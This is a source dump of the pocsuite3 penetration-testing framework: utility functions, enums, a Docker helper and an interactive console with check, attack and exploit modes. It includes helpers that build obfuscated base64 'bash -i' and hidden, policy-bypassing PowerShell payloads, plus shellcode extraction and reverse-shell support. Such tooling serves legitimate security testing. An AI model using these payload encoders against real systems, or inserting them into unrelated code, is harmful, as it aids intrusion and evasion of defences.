def make_binary_from_obj(o_file, os_target, os_target_arch, debug=0, is_dll=False):
"""
Function for test shellcode with app written on c-language
"""
if is_dll and os_target == OS.LINUX:
print('Dll can be generated only for WINDOWS OS')
return None
app = 'ld'
find_app = ''
if OS_SYSTEM == OS.WINDOWS:
if os_target == OS.LINUX:
app += '.gold'
elif os_target == OS.WINDOWS and os_target_arch == OS_ARCH.X64:
app += '64'
app += '.exe'
find_app = search_file("%s" % app, paths.SHELLCODES_DEV_PATH)
if find_app:
if debug:
print("app: '%s' found at %s" % (app, find_app))
else:
print("You must install app: '%s' and maybe edit environment variables path to it" % app)
return None
elif OS_SYSTEM == OS.LINUX:
find_app = app
else:
print("Can't understand source os: %s" % OS_SYSTEM)
return None
c_exe = (o_file.split('.'))[0]
commands_list = [find_app, '-o', c_exe, o_file, '--strip-all']
if OS_SYSTEM == OS.LINUX:
if os_target == OS.WINDOWS:
commands_list.append('-m')
commands_list.append('i386pe')
if is_dll:
commands_list.append('-shared')
p = Popen(commands_list)
p.communicate()
elif OS_SYSTEM == OS.WINDOWS:
if is_dll:
commands_list.append('-shared')
p = Popen(commands_list)
p.communicate()
else:
print("ERR: source os (%s) is not supported" % OS_SYSTEM)
if os_target == OS.WINDOWS:
newname = c_exe + '.dll' if is_dll else c_exe + '.exe'
if os.path.exists(newname):
os.remove(newname)
os.rename(c_exe, newname)
print("Complete. Now you can try to execute file: %s" % c_exe)
def extract_shell_from_obj(file):
with open(file, 'rb') as f:
contents = f.read()
flag = contents[4]
if flag == '\x01':
length = struct.unpack('<H', contents[124:126])[0]
contents = contents[272:272 + length]
elif flag == '\x02':
length = struct.unpack('<H', contents[160:162])[0]
contents = contents[384:384 + length]
else:
raise Exception("Unknown architecture. Can't extract shellcode")
print(', '.join('0x%02x' % ord(c) for c in contents))
return contents
def replace_by_real_values(shellcode, kwargs):
for key, value in kwargs.items():
shellcode = shellcode.replace(key, value)
return shellcode
def ip_to_hex(ip, is_big=True):
parts = [int(part) for part in ip.split('.')]
if is_big:
return ''.join(chr(part) for part in parts).encode()
return ''.join(chr(part) for part in reversed(parts)).encode()
def port_to_hex(port, is_big=True):
if is_big:
return struct.pack('>H', port)
return struct.pack('<H', port)
def validate_ip_addr(addr):
import socket
try:
socket.inet_aton(addr)
return True
except socket.error:
return False
def ip_to_dd(addr):
return ''.join('%02x' % int(x) for x in reversed(addr.split('.'))).encode()
def port_to_dd(port):
return ''.join('%02x' % x for x in struct.pack('<H', port)).encode()
def get_unicode(value):
result = chardet.detect(value)
charset = result['encoding'] or UNICODE_ENCODING
return value.decode(charset)
def rtrim(text, char):
"""
Delete the specified character on the right
:param text: str
:param char: character
:return:
"""
length = len(char)
if length > len(text):
return text
if char == text[-length:]:
text = text[:-length]
return text
def ltrim(text, char):
"""
Delete the specified character on the left
:param text: str
:param char: character
:return:
"""
length = len(char)
if length > len(text):
return text
if char == text[:length]:
text = text[length:]
return text
def index_modules(modules_directory):
""" Returns list of all exploits modules
:param str modules_directory: path to modules directory
:return list: list of found modules
"""
modules = []
for root, _, files in os.walk(modules_directory):
files = filter(lambda x: not x.startswith("__") and x.endswith(".py") or x.endswith(".yaml"), files)
modules.extend(map(lambda x: os.path.join(root, os.path.splitext(x)[0]), files))
return modules
def humanize_path(path: str) -> str:
""" Replace python dotted path to directory-like one.
ex. foo.bar.baz -> foo/bar/baz
:param str path: path to humanize
:return str: humanized path
"""
return path.replace(".", os.sep)
def pythonize_path(path: str) -> str:
""" Replaces argument to valid python dotted notation.
ex. foo/bar/baz -> foo.bar.baz
:param str path: path to pythonize
:return str: pythonized path
"""
return path.replace(os.sep, ".")
def module_required(fn):
""" Checks if module is loaded.
Decorator that checks if any module is activated
before executing command specific to modules (ex. 'run').
"""
@wraps(fn)
def wrapper(self, *args, **kwargs):
if not self.current_module:
logger.error("You have to activate any module with 'use' command.")
return
return fn(self, *args, **kwargs)
try:
name = "module_required"
wrapper.__decorators__.append(name)
except AttributeError:
wrapper.__decorators__ = [name]
return wrapper
def stop_after(space_number):
""" Decorator that determines when to stop tab-completion
Decorator that tells command specific complete function
(ex. "complete_use") when to stop tab-completion.
Decorator counts number of spaces (' ') in line in order
to determine when to stop.
ex. "use exploits/dlink/specific_module " -> stop complete after 2 spaces
"set rhost " -> stop completing after 2 spaces
"run " -> stop after 1 space
:param space_number: number of spaces (' ') after which tab-completion should stop
:return:
"""
def _outer_wrapper(wrapped_function):
@wraps(wrapped_function)
def _wrapper(self, *args, **kwargs):
try:
if args[1].count(" ") == space_number:
return []
except Exception as err:
logger.error(err)
return wrapped_function(self, *args, **kwargs)
return _wrapper
return _outer_wrapper
def check_port(ip, port):
res = socket.getaddrinfo(ip, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
af, sock_type, proto, canonname, sa = res[0]
s = socket.socket(af, sock_type, proto)
try:
s.connect(sa)
s.shutdown(2)
return True
except socket.error:
return False
finally:
s.close()
def exec_cmd(cmd, raw_data=True):
cmd = shlex.split(cmd)
out_data = b''
try:
p = subprocess.Popen(
cmd, shell=False, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
while p.poll() is None:
line = p.stdout.read()
out_data += line
except Exception as ex:
logger.error("Execute cmd error {}".format(str(ex)))
encoding = chardet.detect(out_data).get('encoding')
encoding = encoding if encoding else 'utf-8'
if IS_WIN:
out_data = out_data.split(b'\r\n\r\n')
else:
out_data = out_data.split(b'\n\n')
if not raw_data:
for i, data in enumerate(out_data):
out_data[i] = data.decode(encoding, errors='ignore')
return out_data
def mosaic(s):
""" Replacing URL/IPv4/IPv6 Address with asterisk's
eg. A.B.C.D -> *.*.C.D
"""
s = str(s)
if not conf.get('ppt', False):
return s
scheme = ''
t = s.split('://', 1)
if len(t) > 1:
scheme, s = f'{t[0]}://', t[1]
# URL/IPv6
if len(re.findall(r':', s)) >= 3:
t = s.split(':')
for i in range(1, len(t) - 2):
if ']' in t[i]:
break
if t[i] != '':
t[i] = '*'
s = ':'.join(t)
# URL/IPv4
elif len(re.findall(r'\.', s)) >= 3:
t = s.split('.', 4)
t[0] = t[1] = '*'
s = '.'.join(t)
elif '.' in s:
t = s.split('.')
for i in range(0, len(t) - 1):
t[i] = '*'
s = '.'.join(t)
return scheme + s
def encoder_bash_payload(cmd: str) -> str:
ret = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(cmd.encode()).decode()
return ret
def encoder_powershell_payload(powershell: str):
command = "powershell -NonI -W Hidden -NoP -Exec Bypass -Enc " + base64.b64encode(
'\x00'.join(list(powershell)).encode() + b'\x00').decode()
return command
def get_host_ipv6(dst='2001:db8::'):
""" Fetches source ipv6 address when connect to dst
Args:
dst <str>: target ip or domain
Returns:
<str>: source ipv6 address
"""
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
try:
s.connect((dst, 1027))
except socket.error:
return None
return s.getsockname()[0]
class OrderedSet(collections.OrderedDict, collectionsAbc.MutableSet):
def add(self, e):
self[e] = None
def discard(self, e):
self.pop(e, None)
def __le__(self, other):
return all(e in other for e in self)
def __lt__(self, other):
return self <= other and self != other
def __ge__(self, other):
return all(e in self for e in other)
def __gt__(self, other):
return self >= other and self != other
def __repr__(self):
return 'OrderedSet([%s])' % (', '.join(map(repr, self.keys())))
def __str__(self):
return '{%s}' % (', '.join(map(repr, self.keys())))
def get_file_text(filepath):
with open(filepath, 'rb') as f:
content = f.read()
encoding = chardet.detect(content)['encoding'] or 'utf-8'
return content.decode(encoding)
if __name__ == '__main__':
cmd = 'ping baidu.com'
res = exec_cmd(cmd=cmd)
print(res)
================================================
FILE: pocsuite3/lib/core/convert.py
================================================
import sys
from pocsuite3.lib.core.settings import IS_WIN
from pocsuite3.lib.core.settings import UNICODE_ENCODING
def single_time_warn_message(message):
"""
Cross-linked function
"""
sys.stdout.write(message)
sys.stdout.write("\n")
sys.stdout.flush()
def stdout_encode(data):
ret = None
try:
data = data or ""
# Reference: http://bugs.python.org/issue1602
if IS_WIN:
output = data.encode(sys.stdout.encoding, "replace")
if '?' in output and '?' not in data:
warn_msg = "cannot properly display Unicode characters "
warn_msg += "inside Windows OS command prompt "
warn_msg += "(http://bugs.python.org/issue1602). All "
warn_msg += "unhandled occurances will result in "
warn_msg += "replacement with '?' character. Please, find "
warn_msg += "proper character representation inside "
warn_msg += "corresponding output files. "
single_time_warn_message(warn_msg)
ret = output
else:
ret = data.encode(sys.stdout.encoding)
except Exception:
ret = data.encode(UNICODE_ENCODING) if isinstance(data, str) else data
return ret
================================================
FILE: pocsuite3/lib/core/data.py
================================================
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.log import LOGGER
# logger
logger = LOGGER
# object to share within function and classes command
# line options and settings
conf = AttribDict()
# Dictionary storing
# (1)targets, (2)registeredPocs, (3) bruteMode
# (4)results, (5)pocFiles
# (6)multiThreadMode \ threadContinue \ threadException
kb = AttribDict()
# object to store original command line options
cmd_line_options = AttribDict()
# object to store merged options (command line, configuration file and default options)
merged_options = AttribDict()
# pocsuite paths
paths = AttribDict()
================================================
FILE: pocsuite3/lib/core/datatype.py
================================================
from collections import OrderedDict
class AttribDict(OrderedDict):
"""
AttrDict extends OrderedDict to provide attribute-style access.
Items starting with __ or _OrderedDict__ can't be accessed as attributes.
"""
__exclude_keys__ = set()
def __getattr__(self, name):
if (name.startswith('__')
or name.startswith('_OrderedDict__')
or name in self.__exclude_keys__):
return super(AttribDict, self).__getattribute__(name)
else:
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
if (name.startswith('__')
or name.startswith('_OrderedDict__')
or name in self.__exclude_keys__):
return super(AttribDict, self).__setattr__(name, value)
self[name] = value
def __delattr__(self, name):
if (name.startswith('__')
or name.startswith('_OrderedDict__')
or name in self.__exclude_keys__):
return super(AttribDict, self).__delattr__(name)
del self[name]
================================================
FILE: pocsuite3/lib/core/decorators.py
================================================
import hashlib
def cachedmethod(f, cache={}):
"""
Method with a cached content
Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
"""
def _(*args, **kwargs):
key_string = "|".join(str(_) for _ in (f, args, kwargs)).encode()
key = int(hashlib.md5(key_string).hexdigest(), 16) & 0x7fffffffffffffff
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return _
================================================
FILE: pocsuite3/lib/core/docker_env.py
================================================
from io import BytesIO
from docker import client
from docker import errors
from pocsuite3.lib.core.data import logger
class DockerEnv:
def __init__(self):
self.client = client.from_env()
def build(self, name, docker_file):
file_obj = BytesIO(docker_file.encode())
try:
logger.info("Building image...")
build_info = self.client.images.build(fileobj=file_obj, tag=name)
return build_info
except errors.BuildError as e:
logger.error(e)
def run(self, tag_name, docker_file, ports, envs, volumes):
try:
# if image exists run
self.client.images.get(tag_name)
logger.info("Image {} exists".format(tag_name))
run_info = self.client.containers.run(
tag_name,
detach=True,
ports=ports,
environment=envs,
volumes=volumes
)
return run_info
except errors.ImageNotFound:
# if image not exists, build image first
logger.info("Image {} does not exist".format(tag_name))
build_info = self.build(tag_name, docker_file)
if build_info[0].tags:
run_info = self.client.containers.run(
tag_name,
detach=True,
ports=ports,
environment=envs,
volumes=volumes
)
return run_info
if __name__ == "__main__":
docker_env = DockerEnv()
ports = {"8080/tcp": '8899', '8090/tcp': ("127.0.0.1", 8890)}
env = ["PORT=8899", "PORT=8890"]
volumes = ["/tmp:/home"]
dockerfile = "FROM ubuntu:latest"
image_tag = "ubuntu:pocsuite"
docker_env.run(
image_tag,
docker_file=dockerfile,
ports=ports,
envs=env,
volumes=volumes
)
================================================
FILE: pocsuite3/lib/core/enums.py
================================================
from pocsuite3.lib.core.datatype import AttribDict
class LOGGING_LEVELS:
NOTSET = 0
DEBUG = 10
INFO = 20
WARNING = 30
ERROR = 40
CRITICAL = 50
class CUSTOM_LOGGING:
SYSINFO = 21
SUCCESS = 22
ERROR = 23
WARNING = 24
class OUTPUT_STATUS:
SUCCESS = 1
FAILED = 0
class HTTP_HEADER:
ACCEPT = "Accept"
ACCEPT_CHARSET = "Accept-Charset"
ACCEPT_ENCODING = "Accept-Encoding"
ACCEPT_LANGUAGE = "Accept-Language"
AUTHORIZATION = "Authorization"
CACHE_CONTROL = "Cache-Control"
CONNECTION = "Connection"
CONTENT_ENCODING = "Content-Encoding"
CONTENT_LENGTH = "Content-Length"
CONTENT_RANGE = "Content-Range"
CONTENT_TYPE = "Content-Type"
COOKIE = "Cookie"
EXPIRES = "Expires"
HOST = "Host"
IF_MODIFIED_SINCE = "If-Modified-Since"
LAST_MODIFIED = "Last-Modified"
LOCATION = "Location"
PRAGMA = "Pragma"
PROXY_AUTHORIZATION = "Proxy-Authorization"
PROXY_CONNECTION = "Proxy-Connection"
RANGE = "Range"
REFERER = "Referer"
REFRESH = "Refresh" # Reference: http://stackoverflow.com/a/283794
SERVER = "Server"
SET_COOKIE = "Set-Cookie"
TRANSFER_ENCODING = "Transfer-Encoding"
URI = "URI"
USER_AGENT = "User-Agent"
VIA = "Via"
X_POWERED_BY = "X-Powered-By"
X_DATA_ORIGIN = "X-Data-Origin"
class PROXY_TYPE:
HTTP = "HTTP"
HTTPS = "HTTPS"
SOCKS4 = "SOCKS4"
SOCKS5 = "SOCKS5"
SOCKS5H = "SOCKS5H"
class ERROR_TYPE_ID:
NOTIMPLEMENTEDERROR = 2
CONNECTIONERROR = 3.0
HTTPERROR = 3.1
CONNECTTIMEOUT = 3.2
TOOMANYREDIRECTS = 3.3
OTHER = 4
class OS:
LINUX = "linux"
WINDOWS = "windows"
class OS_ARCH:
X86 = "32bit"
X64 = "64bit"
class ENCODER_TPYE:
XOR = "xor"
ALPHANUMERIC = "alphanum"
ROT_13 = "rot_13"
FNSTENV_XOR = "fnstenv"
JUMPCALL_XOR = "jumpcall"
class SHELLCODE_TYPE:
JSP = "jsp"
JAR = "jar"
WAR = "war"
PYTHON = "python"
PHP = "php"
ASPX = "aspx"
class SHELLCODE_CONNECTION:
BIND = 'bind'
REVERSE = 'reverse'
class PLUGIN_TYPE:
TARGETS = 'targets'
POCS = 'pocs'
RESULTS = 'results'
class AUTOCOMPLETE_TYPE:
SQL = 0
OS = 1
POCSUITE = 2
API = 3
CONSOLE = 4
class POC_CATEGORY:
EXPLOITS = AttribDict()
EXPLOITS.WEBAPP = 'WebApp'
EXPLOITS.DOS = 'DoS'
EXPLOITS.REMOTE = 'Remote'
EXPLOITS.LOCAL = 'Local'
TOOLS = AttribDict()
TOOLS.CRACK = 'Crack'
PROTOCOL = AttribDict()
PROTOCOL.HTTP = "Http"
PROTOCOL.FTP = "Ftp"
PROTOCOL.SSH = "Ssh"
PROTOCOL.TELNET = "Telnet"
PROTOCOL.REDIS = "Redis"
PROTOCOL.SMTP = 'SMTP'
PROTOCOL.DNS = 'DNS'
PROTOCOL.SNMP = 'SNMP'
PROTOCOL.SMB = 'SMB'
PROTOCOL.MQTT = 'MQTT'
PROTOCOL.MYSQL = 'MySQL'
PROTOCOL.RDP = 'RDP'
PROTOCOL.UPNP = 'UPnP'
PROTOCOL.AJP = 'AJP'
PROTOCOL.XMPP = 'XMPP'
PROTOCOL.WINBOX = 'Winbox'
PROTOCOL.MEMCACHED = 'Memcached'
PROTOCOL.BACNET = 'BACnet'
PROTOCOL.T3 = 'T3'
class OPTION_TYPE:
BOOLEAN = "boolean"
INTEGER = "integer"
FLOAT = "float"
STRING = "string"
class VUL_TYPE:
BACKDOOR = 'Backdoor'
INSECURE_COOKIE_HANDLING = 'Insecure Cookie Handling'
CSRF = 'CSRF'
XSS = 'XSS'
UXSS = 'UXSS'
SSRF = 'Server-Side Request Forgery'
SHELLCODE = 'ShellCode'
SQL_INJECTION = 'SQL Injection'
ARBITRARY_FILE_DOWNLOAD = 'Arbitrary File Download'
ARBITRARY_FILE_CREATION = 'Arbitrary File Creation'
ARBITRARY_FILE_DELETION = 'Arbitrary File Deletion'
ARBITRARY_FILE_READ = 'Arbitrary File Read'
OTHER = 'Other'
VARIABLE_COVERAGE = 'Variable Coverage'
COMMAND_EXECUTION = 'Command Execution'
INJECTING_MALWARE_CODES = 'Injecting Malware Codes'
WEAK_PASSWORD = 'Weak Password'
DENIAL_OF_SERVICE = 'Denial Of service'
DATABASE_FOUND = 'Database Found'
UPLOAD_FILES = 'Upload Files'
LOCAL_OVERFLOW = 'Local Overflow'
PRIVILEGE_ESCALATION = 'Privilege Escalation'
INFORMATION_DISCLOSURE = 'Information Disclosure'
LOGIN_BYPASS = 'Login Bypass'
PATH_TRAVERSAL = 'Path Traversal'
RESOLVE_ERROR = 'Resolve Error'
UNAUTHORIZED_ACCESS = 'Unauthorized Access'
PATH_DISCLOSURE = 'Path Disclosure'
CODE_EXECUTION = 'Code Execution'
REMOTE_PASSWORD_CHANGE = 'Remote Password Change'
REMOTE_OVERFLOW = 'Remote Overflow'
DIRECTORY_LISTING = 'Directory Listing'
NULL_BYTE_INJECTION = 'Null Byte Injection'
MAN_IN_THE_MIDDLE = 'Man-in-the-middle'
FORMAT_STRING = 'Format String'
BUFFER_OVERFLOW = 'Buffer Overflow'
CRLF_INJECTION = 'CRLF Injection'
XML_INJECTION = 'XML Injection'
LOCAL_FILE_INCLUSION = 'Local File Inclusion'
REMOTE_FILE_INCLUSION = 'Remote File Inclusion'
CREDENTIAL_PREDICTION = 'Credential Prediction'
HTTP_PARAMETER_POLLUTION = 'HTTP Parameter Pollution'
HTTP_REQUEST_SPLITTING = 'HTTP Request Splitting'
HTTP_RESPONSE_SPLITTING = 'HTTP Response Splitting'
HTTP_RESPONSE_SMUGGLING = 'HTTP Response Smuggling'
HTTP_REQUEST_SMUGGLING = 'HTTP Request Smuggling'
SSI_INJECTION = 'SSI Injection'
OUT_OF_MEMORY = 'Out of Memory'
INTEGER_OVERFLOWS = 'Integer Overflows'
CONTENT_SPOOFING = 'Content Spoofing'
XQUERY_INJECTION = 'XQuery Injection'
BUFFER_OVER_READ = 'Buffer Over-read'
BRUTE_FORCE = 'Brute Force'
LDAP_INJECTION = 'LDAP Injection'
SECURITY_MODE_BYPASS = 'Security Mode Bypass'
BACKUP_FILE_FOUND = 'Backup File Found'
XPATH_INJECTION = 'XPath Injection'
URL_REDIRECTOR_ABUSE = 'URL Redirector Abuse'
CODE_DISCLOSURE = 'Code Disclosure'
USE_AFTER_FREE = 'Use After Free'
DNS_HIJACKING = 'DNS Hijacking'
IMPROPER_INPUT_VALIDATION = 'Improper Input Validation'
UAF = 'Use After Free'
================================================
FILE: pocsuite3/lib/core/exception.py
================================================
from http.client import HTTPException
class PocsuiteBaseException(Exception):
pass
class PocsuiteUserQuitException(PocsuiteBaseException):
pass
class PocsuiteShellQuitException(PocsuiteBaseException):
pass
class PocsuiteDataException(PocsuiteBaseException):
pass
class PocsuiteGenericException(PocsuiteBaseException):
pass
class PocsuiteSystemException(PocsuiteBaseException):
pass
class PocsuiteFilePathException(PocsuiteBaseException):
pass
class PocsuiteConnectionException(PocsuiteBaseException):
pass
class PocsuiteThreadException(PocsuiteBaseException):
pass
class PocsuiteValueException(PocsuiteBaseException):
pass
class PocsuiteMissingPrivileges(PocsuiteBaseException):
pass
class PocsuiteSyntaxException(PocsuiteBaseException):
pass
class PocsuiteValidationException(PocsuiteBaseException):
pass
class PocsuiteMissingMandatoryOptionException(PocsuiteBaseException):
pass
class PocsuitePluginBaseException(PocsuiteBaseException):
pass
class PocsuitePluginDorkException(PocsuitePluginBaseException):
pass
class PocsuiteHeaderTypeException(PocsuiteBaseException):
pass
class PocsuiteIncompleteRead(HTTPException):
def __init__(self, partial, expected=None):
self.args = partial,
self.partial = partial
self.expected = expected
def __repr__(self):
if self.expected is not None:
e = ', %i more expected' % self.expected
else:
e = ''
return '%s(%i bytes read%s)' % (self.__class__.__name__,
len(self.partial), e)
def __str__(self):
return repr(self)
================================================
FILE: pocsuite3/lib/core/interpreter.py
================================================
# pylint: disable=E0202
import os
import re
import chardet
import prettytable
from termcolor import colored
from pocsuite3.lib.controller.controller import start
from pocsuite3.lib.core.common import banner, index_modules, data_to_stdout, module_required, \
get_poc_name, stop_after, get_local_ip, is_ipv6_address_format, rtrim, ltrim, exec_cmd, get_file_text
from pocsuite3.lib.core.data import logger, paths, kb, conf
from pocsuite3.lib.core.enums import POC_CATEGORY, AUTOCOMPLETE_TYPE
from pocsuite3.lib.core.exception import PocsuiteBaseException, PocsuiteShellQuitException
from pocsuite3.lib.core.option import _set_listener, _set_http_referer, _set_http_user_agent, _set_network_proxy, \
_set_network_timeout
from pocsuite3.lib.core.register import load_file_to_module
from pocsuite3.lib.core.settings import IS_WIN
from pocsuite3.lib.core.shell import auto_completion, readline
class BaseInterpreter(object):
global_help = ""
def __init__(self):
self.setup()
self.banner = ""
self.complete = None
# Prepare to execute system commands
self.input_command = ''
self.input_args = ''
def setup(self):
""" Initialization of third-party libraries
Setting interpreter history.
Setting appropriate completer function.
:return:
"""
auto_completion(completion=AUTOCOMPLETE_TYPE.CONSOLE, console=self.complete)
def parse_line(self, line):
""" Split line into command and argument.
:param line: line to parse
:return: (command, argument)
"""
command, _, arg = line.strip().partition(" ")
return command, arg.strip()
@property
def prompt(self):
""" Returns prompt string """
return ">>>"
def get_command_handler(self, command):
""" Parsing command and returning appropriate handler.
:param command: command
:return: command_handler
"""
try:
command_handler = getattr(self, "command_{}".format(command))
except AttributeError:
cmd = self.input_command + ' ' + self.input_args
for line in exec_cmd(cmd=cmd):
result_encoding = chardet.detect(line)['encoding']
if result_encoding:
print(line.decode(result_encoding))
raise PocsuiteBaseException("Pocsuite3 Unknown this command, and run it on system: '{}'".format(command))
return command_handler
def start(self):
""" Routersploit main entry point. Starting interpreter loop. """
while True:
try:
'''
# BUG
https://github.com/knownsec/pocsuite3/issues/317
https://stackoverflow.com/questions/52102240/how-to-apply-coloring-formatting-to-the-displayed-text-in-input-function-simi
colorama works by replacing sys.stdout and sys.stderr with versions that interpret ISO 6429 sequences,
make appropriate Win32 calls to implement them,
and send the rest of the characters on to the underlying stream.
This explains your observations: input doesn’t use the Python-level sys.stdout.write,
and Spyder interprets the sequences itself but is unaffected by the Win32 calls.
The only reasonable fix seems to be to use input with no prompt :(
'''
self.input_command, self.input_args = self.parse_line(input(self.prompt))
command = self.input_command.lower()
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(self.input_args)
except PocsuiteBaseException as warn:
logger.warn(warn)
except EOFError:
logger.info("Pocsuite3 stopped")
break
except KeyboardInterrupt:
logger.warn('Interrupt: use the \'exit\' command to quit')
continue
def complete(self, text, state):
"""Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
if state == 0:
original_line = readline.get_line_buffer()
line = original_line.lstrip()
stripped = len(original_line) - len(line)
start_index = readline.get_begidx() - stripped
end_index = readline.get_endidx() - stripped
if start_index > 0:
cmd, args = self.parse_line(line)
if cmd == "":
complete_function = self.default_completer
else:
try:
complete_function = getattr(self, "complete_" + cmd)
except AttributeError:
complete_function = self.default_completer
else:
complete_function = self.raw_command_completer
self.completion_matches = complete_function(text, line, start_index, end_index)
try:
return self.completion_matches[state]
except IndexError:
return None
def commands(self, *ignored):
""" Returns full list of interpreter commands.
:param ignored:
:return: full list of interpreter commands
"""
return [command.rsplit("_").pop() for command in dir(self) if command.startswith("command_")]
def raw_command_completer(self, text, line, start_index, end_index):
""" Complete command w/o any argument """
return [command for command in self.suggested_commands() if command.startswith(text)]
def default_completer(self, *ignored):
return []
def suggested_commands(self):
""" Entry point for intelligent tab completion.
Overwrite this method to suggest suitable commands.
:return: list of suitable commands
"""
return self.commands()
class PocsuiteInterpreter(BaseInterpreter):
global_help = """Global commands:
help Print this help menu
use <module> Select a module for usage
search <search term> Search for appropriate module
list|show all Show all available pocs
clear clear the console screen
exit Exit Pocsuite3"""
module_help = """Module commands:
run Run the selected module with the given options
back De-select the current module
set <option name> <option value> Set an option for the selected module
setg <option name> <option value> Set an option for all of the modules
show [info|options|all] Print information, options
check Check if a given target is vulnerable to a selected module's attack
attack Attack target and return target vulnerable infomation
exploit Get a shell from remote target"""
def __init__(self, module_directory=paths.POCSUITE_POCS_PATH):
super(PocsuiteInterpreter, self).__init__()
self.current_module = None
self.raw_prompt_template = None
self.module_prompt_template = None
self.prompt_hostname = "Pocsuite3"
self.show_sub_commands = (
"info", "options", "ip", "all")
self.global_commands = sorted(["use ", "help", "exit", "show ", "search ", "clear"])
self.module_commands = ["run", "back", "set ", "setg ", "check"]
self.module_commands.extend(self.global_commands)
self.module_commands.sort()
self.modules = index_modules(module_directory)
self.module_parent_directory = os.sep.join(
module_directory.rstrip(os.sep).split(os.sep)[0:-1]) + os.sep
self.modules_count = len(self.modules)
# init
conf.console_mode = True
banner()
logger.info("Load Pocs :{}".format(self.modules_count))
self.last_search = []
self.last_ip = []
self.main_modules_dirs = []
for module in self.modules:
temp_module = module
temp_module = ltrim(temp_module, self.module_parent_directory).lstrip(os.sep)
self.main_modules_dirs.append(temp_module)
self.__parse_prompt()
def __parse_prompt(self):
host_colorizing = colored("{host}", attrs=['underline'])
self.raw_prompt_template = f'{host_colorizing} > '
# LIGHTRED_EX=91 are fairly well supported, but not part of the standard.
self.module_prompt_template = host_colorizing + " (\033[91m{module}\033[0m) > "
@property
def module_metadata(self):
return getattr(self.current_module, "pocsuite3_module_path")
@property
def prompt(self):
""" Returns prompt string based on current_module attribute.
Adding module prefix (module.name) if current_module attribute is set.
:return: prompt string with appropriate module prefix.
"""
if self.current_module:
try:
return self.module_prompt_template.format(host=self.prompt_hostname,
module=self.module_metadata)
except (AttributeError, KeyError):
return self.module_prompt_template.format(host=self.prompt_hostname, module="UnnamedModule")
else:
return self.raw_prompt_template.format(host=self.prompt_hostname)
def command_show(self, *args, **kwargs):
sub_command = args[0]
func = "_show_" + sub_command
if not hasattr(self, func):
logger.warning("Unknown 'show' sub-command '{}'. "
"What do you want to show?\n"
"Possible choices are: {}".format(sub_command, self.show_sub_commands))
return
getattr(self, func)(*args, **kwargs)
def command_exit(self, *args, **kwargs):
raise EOFError
def command_clear(self, *args, **kwargs):
if IS_WIN:
os.system('cls')
else:
os.system('clear')
def command_help(self, *args, **kwargs):
data_to_stdout(self.global_help)
data_to_stdout("\n")
if self.current_module:
data_to_stdout("\n")
data_to_stdout(self.module_help)
data_to_stdout("\n")
def _show_ip(self, *args, **kwargs):
self.last_ip = []
ips = get_local_ip(all=True)
tb = prettytable.PrettyTable(["Index", "IP"])
index = 0
for item in ips:
tb.add_row([str(index), item])
self.last_ip.append(item)
index += 1
data_to_stdout("\n" + tb.get_string() + "\n")
def command_back(self, *args, **kwargs):
self.current_module = None
def command_q(self, *args, **kwargs):
if self.current_module:
self.command_back(args, kwargs)
else:
self.command_exit(args, kwargs)
def command_search(self, *args, **kwargs):
keyword = args[0]
if not keyword:
logger.warning("Please specify search keyword. e.g. 'search wordpress'")
return
tb = prettytable.PrettyTable()
tb.field_names = ["Index", "Path"]
search_result = []
for module in self.main_modules_dirs:
m = re.search(keyword, module, re.I | re.S)
if m:
search_result.append((module, m.group(0)))
index = 0
for s, k in search_result:
tb.add_row([index, "{}\033[31m{}\033[0m{}".format(*s.partition(k))])
index = index + 1
self.last_search = [i for i, j in search_result]
data_to_stdout(tb.get_string())
data_to_stdout("\n")
def command_use(self, module_path, *args, **kwargs):
if module_path.isdigit():
index = int(module_path)
if index >= len(self.last_search):
logger.warning("Index out of range")
return
module_path = self.last_search[index]
module_ext = ''
module_path_found = False
for module_ext in ['', '.py', '.yaml']:
if os.path.exists(module_path + module_ext):
module_path_found = True
module_path = module_path + module_ext
break
elif os.path.exists(os.path.join(self.module_parent_directory, module_path + module_ext)):
module_path_found = True
module_path = os.path.join(self.module_parent_directory, module_path + module_ext)
break
if not module_path_found:
err_msg = "No such file: '{0}'".format(module_path)
logger.error(err_msg)
return
if module_ext == '':
if module_path.endswith('.py'):
module_ext = '.py'
elif module_path.endswith('.yaml'):
module_ext = '.yaml'
try:
load_file_to_module(module_path)
self.current_module = kb.current_poc
self.current_module.pocsuite3_module_path = ltrim(rtrim(module_path, module_ext),
self.module_parent_directory)
except Exception as err:
logger.error(str(err))
@module_required
def command_set(self, *args, **kwargs):
key, _, value = args[0].partition(" ")
if key in self.current_module.options:
self.current_module.set_option(key, value)
logger.info("{} => {}".format(key, value))
elif key in self.current_module.global_options:
self.current_module.setg_option(key, value)
logger.info("{} => {}".format(key, value))
elif key in self.current_module.payload_options:
if value.isdigit() and key != "lport":
index = int(value)
if index >= len(self.last_ip):
logger.warning("Index out of range")
return
value = self.last_ip[index]
self.current_module.setp_option(key, value)
logger.info("{} => {}".format(key, value))
else:
logger.error("You can't set option '{}'."
.format(key))
def _attack_mode(self, mod):
"""
根据不同模式发起不同的验证
:param mod: 模式类型 verify|attack|shell
:return:
"""
# 设置全局参数
if self.current_module.current_protocol == POC_CATEGORY.PROTOCOL.HTTP:
target = self.current_module.getg_option("target")
else:
rhost = self.current_module.getg_option("rhost")
rport = self.current_module.getg_option("rport")
target = f"{rhost}:{rport}"
conf.mode = mod
kb.task_queue.put((target, self.current_module))
try:
start()
except PocsuiteShellQuitException:
pass
kb.results = []
def _set_global_conf(self):
"""
设置全局的参数
:return:
"""
if self.current_module.current_protocol == POC_CATEGORY.PROTOCOL.HTTP:
conf.referer = self.current_module.getg_option("referer")
conf.agent = self.current_module.getg_option("agent")
conf.proxy = self.current_module.getg_option("proxy")
conf.timeout = self.current_module.getg_option("timeout")
# 设置全局参数
_set_http_referer()
_set_http_user_agent()
_set_network_proxy()
_set_network_timeout()
@module_required
def command_check(self, *args, **kwargs):
self.current_module.check_requirement(self.current_module.global_options, self.current_module.options)
# 检测必须参数是否被设置
self._set_global_conf()
self._attack_mode("verify")
@module_required
